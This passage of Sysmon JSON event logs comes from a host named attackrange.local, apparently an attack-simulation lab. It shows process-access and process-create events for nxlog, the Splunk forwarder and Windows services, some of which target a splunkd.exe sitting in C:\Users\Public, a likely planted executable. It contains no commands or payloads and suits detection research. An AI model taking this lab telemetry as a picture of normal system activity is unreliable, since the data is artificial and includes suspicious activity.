(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:55.504","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4475,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:56.504\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:56.504","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4476,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:56.536\r\nProcessGuid: {E2A3D6B1-1184-5F25-0000-0010BB320600}\r\nProcessId: 4976\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:53:56.536","ProcessGuid":"{E2A3D6B1-1184-5F25-0000-0010BB320600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4477,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:56.535\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1184-5F25-0000-0010BB320600}\r\nTargetProcessId: 4976\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:56.535","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1184-5F25-0000-0010BB320600}","TargetProcessId":"4976","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4478,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:56.535\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1184-5F25-0000-0010BB320600}\r\nTargetProcessId: 4976\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:56.535","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1184-5F25-0000-0010BB320600}","TargetProcessId":"4976","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4479,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:56.535\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:56.535","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4480,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:56.535\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:56.535","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4481,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:56.535\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:56.535","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4482,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:56.535\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 